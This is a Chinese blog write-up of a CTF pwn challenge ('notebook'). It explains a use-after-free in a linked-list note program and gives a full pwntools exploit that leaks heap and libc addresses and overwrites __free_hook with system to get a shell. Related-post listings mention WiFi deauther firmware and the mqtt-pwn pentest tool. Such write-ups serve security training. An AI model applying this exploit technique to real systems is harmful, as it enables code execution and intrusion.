[BMZCTF-pwn] 49-[2021医疗行业]notebook

最新推荐文章于 2022-07-03 21:51:42 发布
最新推荐文章于 2022-07-03 21:51:42 发布
阅读量396 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123107917
版权

不懂pwn的大夫不是好厨师

题目用链表连接note,有add,free和show

note结构为0x10:memo, 0xf0:content, 0x8:next_ptr

free有UAF漏洞:

unsigned __int64 m2free()
{
  _QWORD *i; // [rsp+0h] [rbp-30h]
  void *ptr; // [rsp+8h] [rbp-28h]
  char buf[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v4; // [rsp+28h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  printf("memo> ");
  read(0, buf, 0x10uLL);
  if ( unk_202020 )
  {
    if ( unk_202020 == 1 )
    {
      free(qword_202018);
      qword_202018 = 0LL;
      --unk_202020;
    }
    else if ( (unsigned int)strncmp16(buf, qword_202018) )
    {
      ptr = qword_202018;
      qword_202018 = (void *)*((_QWORD *)qword_202018 + 32);
      free(ptr);
      --unk_202020;
    }
    else
    {
      for ( i = qword_202018; i; i = (_QWORD *)i[32] )
      {
        if ( (unsigned int)strncmp16(buf, i) )
        {
          free(i);                              // 超过1个,且不是第1个,UAF
          --unk_202020;
          return __readfsqword(0x28u) ^ v4;
        }
      }
    }
  }
  return __readfsqword(0x28u) ^ v4;
}

show通过链表输出,这是个唯一的坑:当free到unsort时ptr这个位置会变成pre_size,show的时候会崩。

unsigned __int64 m3show()
{
  char *s; // [rsp+0h] [rbp-10h]
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  for ( s = (char *)qword_202018; s; s = (char *)*((_QWORD *)s + 32) )
  {
    printf("memo> ");
    puts(s);
    printf("content> ");
    puts(s + 16);
  }
  return __readfsqword(0x28u) ^ v2;
}

需要想办法让它结束。

思路:

  1. 先建一定量填充,让free后unlink不小于1
  2. 建1,2,3三个块先给2free7次show得到堆地址,再free1进入unsort,由于这里指针有问题无法show
  3. 这时再建用到tcache里的2的环,下边把每次单独列(e10是unsort块,这里e10的下一块指针不正常,需要处理)
    1. 建在f20,在f20处写入f40,在f40处写e30 next->x
    2. 建在f20 next->f20
    3. 建在f40 next->f20 同时覆盖f20的指针让它指向e10
    4. 建在330 next->f40 同时覆盖e10的指针为0
  4. 将e10的指针置0恢复正常后就可以show得到libc了
  5. 得到libc后就是简单的doublefree将system写到free_hook再释放/bin/sh

这个题没给libc也起不来远程环境,用最简单的libc-2.27-3ubuntu1作的。如果其它坑应该出在libc上。昨天的hook自动刷新让人心有余悸。

完整exp:

from pwn import *

'''
patchelf --set-interpreter /home/shi/buuctf/buuoj_2.27_amd64/ld-2.27.so pwn
patchelf --add-needed /home/shi/buuctf/buuoj_2.27_amd64/libc-2.27.so pwn
'''

elf = ELF('./pwn')
context.arch = 'amd64'

def connect(local=1):
    global p
    
    if local == 1:
        p = process('./pwn')
    else:
        p = remote('node4.buuoj.cn', 27672) 

libc_elf = ELF('/home/shi/buuctf/buuoj_2.27_amd64/libc-2.27.so')
one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
libc_start_main_ret = 0x21b97
context(arch='amd64', log_level='debug')

menu = b"4.Note Draft\n> "
def add(memo, msg):
    p.sendlineafter(menu, b'1')
    p.sendafter(b"memo> ", memo)
    p.sendafter(b"content> ", msg)

def free(memo):
    p.sendlineafter(menu, b'2')
    p.sendafter(b"memo> ", memo)

def show():
    p.sendlineafter(menu, b'3')

def pwn():
    for i in range(11):
        add(b'X', b'x')
    add(b'1'*0x10, flat(0, 0x111)*3)
    add(b'2'*0x10, flat(0, 0x111)*3)
    add(b'3'*0x10, flat(0, 0x111)*3)
    free(b'2'*0x10)    
    free(b'\x00'*8 + b'2'*8)    
    show()
    p.recvuntil(b'memo> ')
    p.recvuntil(b'memo> ')
    heap_addr = u64(p.recvline()[:-1].ljust(8, b'\x00'))  # 480:xx370
    print('heap:', hex(heap_addr))
    
    for i in range(5):
        free(p64(heap_addr)+ b'2'*8) #0
    
    free(b'1'*0x10)
    
    add(p64(heap_addr+0x20)+b'4'*8, flat(0,0x111, heap_addr-0xf0))
    add(p64(heap_addr+0x20)+b'4'*8, p64(0))
    add(b'5'*0x10, b'A'*0xd0+p64(heap_addr -0x110))
    add(b'6'*0x10, b'A'*0xd0+p64(0))
    show()
    p.recvuntil(b'memo> ')
    p.recvuntil(b'memo> ')
    p.recvuntil(b'memo> ')
    p.recvuntil(b'memo> ')
    libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x60 -0x10 - libc_elf.sym['__malloc_hook']
    libc_elf.address = libc_base
    one_gadget= libc_base + one[0] 
    print('libc:', hex(libc_base))

    free(b'5'*0x10)
    free(p64(0) + b'5'*0x8)
    add(p64(libc_elf.sym['__free_hook']), b'A')
    add(b'/bin/sh\x00', b'\x00')
    add(p64(libc_elf.sym['system']), b'\x00')
    free(b'/bin/sh\x00'+b'5'*8)
    #p.recv()

    p.sendline(b'cat /flag')
    p.interactive()

connect(1)
pwn()

'''
e30->f40->f20->e10->0
0x559d2961ee00:	0x0000559d2961ebf0	0x0000000000000111
0x559d2961ee10:	0x00007f10c687aca0	0x00007f10c687aca0
0x559d2961ee20:	0x0000000000000000	0x0000000000000111
0x559d2961ee30:	0x3636363636363636	0x3636363636363636
....
0x559d2961ef10:	再覆盖这里为0-->0x0000000000000000	0x0000000000000110
0x559d2961ef20:	0x0000559d2961ef40	0x3434343434343434
0x559d2961ef30:	0x0000559d2961ef40	0x0000000000000111
0x559d2961ef40:	预放个e30-->0x3535353535353535	0x3535353535353535
....
0x559d2961f020:	先覆盖这里指向unsort-->0x0000559d2961ee10	0x0000000000000111
0x559d2961f030:	0x3333333333333333	0x3333333333333333
0x559d2961f040:	0x0000559d2961ef20	0x0000000000000111
0x559d2961f050:	0x0000000000000000	0x0000000000000111
'''

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
writeup 2019“新华三杯”中国医疗机构网络安全攻防演练大赛CTF(复赛)
ggzhifeng的博客
11-05 3339
2019年10月31日,由《中国数字医学》杂志社主办、紫光旗下新华三集团支持的2019“新华三杯”中国医疗机构网络安全攻防演练大赛(复赛),在武汉光谷科技会展中心火热开赛。来自全国30多个省市的150家医疗机构,518人参加了本次复赛,这也是迄今为止中国境内规模最大的医疗行业攻防大赛。 复赛共2小时,分为理论题和CTF题,同时进行,CTF共10到题,并且要在2小时内提交writeup…以下是部分...
2021*CTF部分wp
re1wn
01-30 1136
一个废话连篇思路不清的wp,后续会完善
✿2020医疗行业CTF✿MISC-where_py
Tokeii想躺平
07-05 681
就是这个图,用到了cloacked-pixel这个工具 盲猜一手密码123456 命令如下 lsb.py extract 4.png 1.txt 123456 解压之后 很明显这是一个pyc文件 进行逆向还原之后,得到代码 import random rand = random.randint(1, 10) flag = '???' k = [] for i in range(len(flag)): k.append(ord(flag[i]) & 15 ^ rand) k.app.
攻防世界PWNnotebook题解
seaaseesa的博客
11-21 520
Notebook 研究了一下,做出来的人挺少,还挺有成就感 首先,检查一下程序的保护机制,发现PIE和RELRO未开启 然后,我们用IDA分析一下,看起来好复杂的样子 发现有溢出和格式化字符串漏洞 首先当然是想到利用格式化字符串漏洞来泄露canary的值 要想执行格式化字符串漏洞,得满足那个if条件 我想了好久,才反应过来,如果有传入格式化的字符串,这个条件就不可...
✿2020医疗行业CTF✿多余的音符
Tokeii想躺平
05-07 529
之前参加的比赛 题干 小明在医院上班时听到了一首熟悉的歌曲,精通音律的他马上发现了其中存在的问题。 flag为flag{按顺序找出来的多余的音符}。 下载地址 链接:https://pan.baidu.com/s/1fH4B_kj-j5mY8-ys_RTWsA 提取码:6666 思路如下: 因为没有乐理基础,只能通过软件来辅助,比赛完和其他人讨论有位大哥差点猜出答案,佩服佩服 首先解压,听了下,内行的话可以很快的猜出来这是洛天依的声音。 题目要求是找出多余的音符 我们把两段音频拖入Melodyne,对比发现
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
gris-treinamentos-pwn-2021
03-31
gris-treinamentos-pwn-2021 幻灯片浏览器
2021 强网杯 pwn notebook
yongbaoii的博客
04-18 607
kernal pwn 给了几个文件,然后来看看启动文件 #!/bin/sh stty intr ^] exec timeout 300 qemu-system-x86_64 -m 64M -kernel bzImage -initrd rootfs.cpio -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" -nographic -net user -net nic -device e1000 -smp cores=2,threads=2
卫生CTF 2021 Web
feng的博客
07-11 1420
前言 比赛是第二届全国卫生健康行业网络安全技能大赛,赛后借了个账号复现了一下Web题,整体偏简单叭,做到CMS那题的时候环境关了。 签到 f12,拿到flag。 easy_web1 f12发现There_is_no_flag_here.php,再f12提示本地访问: Client-ip:127.0.0.1 即可得到flag。 easy_web2 ctfshow上的原题,直接打了: ?shell=/???/????64 /???????? 然后base64解码即可。 super_hacker Via 头
BMZCTF 山东省大学生网络技术大赛-baby
qq_26243045的博客
12-03 740
下载附件,是一个脚本文件: ``` # -*- coding: utf-8 -*- from Crypto.PublicKey import RSA import libnum import uuid flag = "flag{***************}" rsa = RSA.generate(4096,e=3) p = rsa.p d = rsa.d e = rsa.e N = rsa.n m = libnum.s2n(flag) c = pow(m, e, N..
2021CSTCCTF MISC-wp(部分)
时间大幻剧的博客
05-06 922
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录RGBzipMemory_1Memory_2 RGB 1、打开文件发现每行三个255 联想题目应该是用RGB颜色画图 2、网上搜索了脚本修改了一下,由于给的txt一共有28864行,进行了各种拆分,最后拆分成41*704时能够看到上下截断的flag from PIL import Image x = 41 y = 704 im = Image.new("RGB",(y,x)) file = open("./code.txt",
✿2020医疗行业CTF✿累了来看看图吧
Tokeii想躺平
05-07 336
将Word文件修改后缀名后解压 在目录**\word\media**下有两张图片 上图为隐藏的图片,使用steghide 解压出隐藏的内容,密码为文件名 .\steghide.exe extract -sf doctor.jpg -p doctor 得到一个1.txt 得到flag:flag{671642b5-e911-4203-97ef-4f872b3fe84a} ...
2021-6-8:参加CTF校赛的WP
Hammers_12的博客
06-08 1634
一、Sign_in 简单web题 正常思路先看一下源码 按F12 后看到答案 二、签到 简单Misc题 打开以后 看到有问题和文件夹可以选择 直接选到底 直接得到flag 三、简单题 Reverse简单题 直接打开附件 给出附件为getflag.c文件, 可以看出,flag即为FJZ{1jf11dm4hpns9k0wk2s}的解密 char *caesar_f(char * passwd) { int i,j...
CTF notebook
zero
08-11 843
Debug=0 Local=1 Frida=0 Debug_pwntools=1 #常量 Local_path='./notebook' Remote_addr='' Port=1 frida_script_path='./frida.js' ...
js中的new file_buuoj刷题——ciscn_final_2看_IO_FILE
weixin_39845221的博客
11-29 145
题目概览标准菜单堆,64位题,没有去掉符号表,保护全开。首先nop掉alarm没有edit函数Sandbox_Loading这个函数中调用了prctl函数,然后定义了一大堆变量函数原型int prctl(int option, unsigned long arg2, unsigned long arg3,unsigned long arg4, unsigned long arg5);通过阅读手册,...
[wp]bmzclub几道题的writeup
小飒的博客
07-03 738
边刷题,边写wp flag{Fourbase123}-… .---- -… -… -… …-- --… …- -… -… --… -… …-- .---- --… …-- …— --… --… …- … …-. --… …-- …-- ----- … …-. …-- …-- …-- …- …-- … --… ----. --… -… 61666374667B317327745F73305F333435797D afctf{1s’t_s0_345y}https://atool.vip/corevalue/ H
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值